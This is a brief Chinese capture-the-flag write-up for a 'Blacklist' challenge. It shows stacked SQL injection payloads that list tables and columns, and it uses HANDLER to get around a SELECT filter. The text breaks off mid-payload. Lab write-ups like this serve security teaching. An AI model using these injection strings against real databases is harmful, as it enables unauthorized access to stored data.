Blacklist(堆疊注入,handler代替select)

測試:1 測試:1’ //有報錯 測試發現union select語句可以回顯出waf 利用堆疊注入查表1’;show tables;–+ // ; 結束上一條sql語句,再繼續構造下一條語句。堆疊注入的侷限性在於並不是每一個環境下都可以執行,可能受到API或者數據庫引擎不支持的限制。 查字段1’;show columns from FlagHere;–+ 1’;handler FlagHere
相關文章
相關標籤/搜索